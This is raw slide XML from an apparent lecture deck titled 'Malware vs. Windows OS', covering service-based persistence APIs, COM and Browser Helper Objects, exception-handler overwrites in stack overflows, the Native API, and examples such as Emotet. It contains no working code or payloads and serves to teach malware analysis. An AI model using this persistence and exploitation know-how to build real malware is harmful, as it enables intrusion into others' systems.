        <p:spPr>
          <a:xfrm>
            <a:off x="794152" y="1556792"/>
            <a:ext cx="7555696" cy="3744416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1272" name="Google Shape;1272;p135"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5940152" y="1907540"/>
            <a:ext cx="1440160" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="4A7DBA"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="med" w="med" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1273" name="Google Shape;1273;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7662576" y="1722874"/>
            <a:ext cx="1374543" cy="369332"/>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Mutex name</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym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36"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;p136"/>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b="1" lang="en-GB"/>
              <a:t>Service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Another way for malware to execute additional code is by installing it as a service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Normally run as SYSTEM or another privileged account</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Provide another way to maintain persistence on a system, automatically run when the OS starts, and may not even show up in the Task Manager as a process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Services can be installed and manipulated via a few Windows API functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="481"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>OpenSCManager</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="481"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateService</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="481"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>StartService</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored in the registry: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\CurrentControlSet\Services</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>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37"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Google Shape;1285;p137"/>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Common Services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>WIN32_SHARE_PROCESS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Svchost.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>WIN32_OWN_PROCESS </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>KERNEL_DRIVER </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SC program, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>sc qc “Spooler”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="16832" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4060244"/>
            <a:ext cx="6812705" cy="2537004"/>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38"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p138"/>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b="1" lang="en-GB"/>
              <a:t>Component Object Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(COM)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>an interface standard that makes it possible for different software components to call each other’s code without knowledge of specifics about each other</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>COM works with any programming language, especially OOP languages.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>COM is implemented as a client/server framework.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Each thread that uses COM must call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>OleInitialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CoInitializeEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> function at least once prior to calling any other COM library functions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Access via</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Class Identifiers (CLSIDs)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Interface Identifiers (IIDs)</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39"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Google Shape;1299;p139"/>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Common COM functions/interfaces</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CoCreateInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: get access COM functionality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: allows a program to launch IE and access a website. It is a part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>IWebBrowser2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591943" y="2996952"/>
            <a:ext cx="5995018" cy="2357936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p139"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307613" y="5373216"/>
            <a:ext cx="8563678" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">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Some malware implements a malicious COM server, which is subsequently used by other applications. Common COM server functionality for malware is through </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Browser Helper Objects (BHOs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, which are third-party plug-ins for Internet Explorer.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4"/>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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p14"/>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b="1" lang="en-GB" sz="2000"/>
              <a:t>2018 – User information cyber attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800"/>
              <a:t>Emotet : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>is a modular Trojan that downloads or drops banking Trojans</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000"/>
              <a:t>2019 - supply chain attack </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Malware inserted into HAVC suppliers, IoT, smarthome</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Operation ShadowHammer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>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140"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307" name="Google Shape;1307;p140"/>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Exceptions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Exceptions allow a program to handle events outside the flow of normal execution caused by errors (e.g. division by zero)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1308" name="Google Shape;1308;p140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149904" y="5159060"/>
            <a:ext cx="7238520" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent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Exception handlers can be used in exploit code to gain execution. A pointer to exception-handling information is stored on the stack, and during a stack overflow, an attacker can overwrite the pointer.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1309" name="Google Shape;1309;p140"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816841" y="3284984"/>
            <a:ext cx="5547712" cy="1392932"/>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141"/>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Native API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p141"/>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The Native API is a lower-level interface for interacting with Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Calling functions in the Native API bypasses the normal Windows API.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>Ntdll.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>directly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
